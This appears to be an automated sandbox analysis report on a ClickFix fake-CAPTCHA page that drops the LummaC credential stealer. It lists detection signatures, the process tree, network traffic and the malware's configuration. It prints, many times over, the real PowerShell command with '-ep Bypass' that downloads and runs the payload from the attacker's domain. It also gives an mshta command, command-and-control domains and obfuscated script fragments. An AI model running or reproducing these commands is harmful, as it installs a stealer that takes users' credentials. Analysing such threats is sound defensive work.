Edit tour

Windows Analysis Report
https://rea.grupolalegion.ec/p.php/1

Overview

General Information

Sample URL:	https://rea.grupolalegion.ec/p.php/1
Analysis ID:	1631596
Infos:

Detection

CAPTCHA Scam ClickFix, LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detect drive by download via clipboard copy & paste

Found malware configuration

Multi AV Scanner detection for dropped file

Yara detected CAPTCHA Scam ClickFix

Yara detected LummaC Stealer

AI detected suspicious Javascript

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

HTML page adds supicious text to clipboard

HTML page contains obfuscated javascript

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Abnormal high CPU Usage

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2252,i,18259865782207701125,4781670294957568771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

mshta.exe (PID: 5220 cmdline: mshta https://rea.grupolalegion.ec/p.php MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Captcha.exe (PID: 1180 cmdline: "C:\ProgramData\Captcha.exe" MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)

Captcha.exe (PID: 6636 cmdline: none MD5: 05B7F29D1BAEAC0A7513D094BFC12A92)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.2108416390.0000000001CBA000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000011.00000002.2108523278.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000011.00000003.1590701531.0000000001D00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
17.2.Captcha.exe.1cba000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.Captcha.exe.1cba000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.Captcha.exe.1e66000.2.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.3.Captcha.exe.1e66000.6.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.2.Captcha.exe.1e66000.2.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.3.Captcha.exe.1d00000.7.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
17.3.Captcha.exe.1e66000.6.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

HTML

Source	Rule	Description	Author	Strings
1.4.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security
1.1.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Invoke-WebRequest Execution

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7012, TargetFilename: C:\ProgramData\Captcha.exe

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta https://rea.grupolalegion.ec/p.php, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'", ProcessId: 7012, ProcessName: powershell.exe

Suricata Signatures

Joe Security ANOMALY Windows PowerShell HTTP PE File Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:48:30.233854+0100	1810003	2	Potentially Bad Traffic	190.92.154.206	443	192.168.2.7	49725	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T11:48:30.120254+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49725	190.92.154.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\ProgramData\Captcha.exe

Avira: detection malicious, Label: TR/Redcap.lcybk

Found malware configuration

Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["culasova.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "Dvh8ui--keu1"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Captcha.exe

ReversingLabs: Detection: 39%

Sample uses string decryption to hide its real strings

Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: culasova.icu
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: explorebieology.run
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: gadgethgfub.icu
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: moderzysics.top
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: techmindzs.live
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: codxefusion.top
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: phygcsforum.life
Source: 00000011.00000003.1590701531.0000000001E66000.00000004.00001000.00020000.00000000.sdmp	String decryptor: techspherxe.top

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 1.4.pages.csv, type: HTML
Source: Yara match	File source: 1.1.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rea.grupolalegion.ec/p.php/1... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious script designed to execute remote commands and potentially steal user data. The combination of these factors indicates a high risk of harm and should be treated with caution.

HTML page contains obfuscated javascript

Source: https://rea.grupolalegion.ec/p.php/1

HTTP Parser: (function(_0x4a4c13,_0x1ba179){const _0x10f3e2=_0x2875,_0x478ffb=_0x4a4c13();while(!![]){try{const _

Source: https://rea.grupolalegion.ec/p.php/1	HTTP Parser: No favicon
Source: https://rea.grupolalegion.ec/p.php/1	HTTP Parser: No favicon
Source: https://rea.grupolalegion.ec/p.php/1	HTTP Parser: No favicon
Source: https://rea.grupolalegion.ec/p.php/1	HTTP Parser: No favicon
Source: https://rea.grupolalegion.ec/p.php/1	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.7:49725 version: TLS 1.2

Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	17_3_01CD5051
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	17_3_01CC7051
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01C8DBB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01C91BB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01CAFBB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01CA1BB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01CBBBB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01CC9BB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	17_3_01CDBBB0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01C8CDF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01CA0DF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01CAEDF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01CBADF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01CC8DF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	17_3_01CDADF0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-5B941F00h]	17_3_01CD950D
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	17_3_01CC767A
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	17_3_01CD567A
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	17_3_01CB7620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	17_3_01CB7620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	17_3_01CC3620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	17_3_01CC3620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	17_3_01CD1620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	17_3_01CD1620
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], ebx	17_2_00F79030
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov dword ptr [esp], edx	17_2_00F924F0
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov edi, ebp	17_3_01CBD9B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then not ebx	17_3_01CBD9B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov edi, ebp	17_3_01CB19B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then not ebx	17_3_01CB19B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov edi, ebp	17_3_01CA39B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then not ebx	17_3_01CA39B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then mov edi, ebp	17_3_01CCB9B1
Source: C:\ProgramData\Captcha.exe	Code function: 4x nop then not ebx	17_3_01CCB9B1

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: culasova.icu
Source: Malware configuration extractor	URLs: explorebieology.run
Source: Malware configuration extractor	URLs: gadgethgfub.icu
Source: Malware configuration extractor	URLs: moderzysics.top
Source: Malware configuration extractor	URLs: techmindzs.live
Source: Malware configuration extractor	URLs: codxefusion.top
Source: Malware configuration extractor	URLs: phygcsforum.life
Source: Malware configuration extractor	URLs: techspherxe.top

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49725 -> 190.92.154.206:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 190.92.154.206:443 -> 192.168.2.7:49725

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	UDP traffic detected without corresponding DNS query: 104.40.149.189
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 104.40.149.189
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /p.php/1?js HTTP/1.1Host: rea.grupolalegion.ecConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /p.php HTTP/1.1Accept: /Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rea.grupolalegion.ecConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Viber.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rea.grupolalegion.ecConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: rea.grupolalegion.ec

Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 0000000F.00000002.1587781228.0000000000E74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
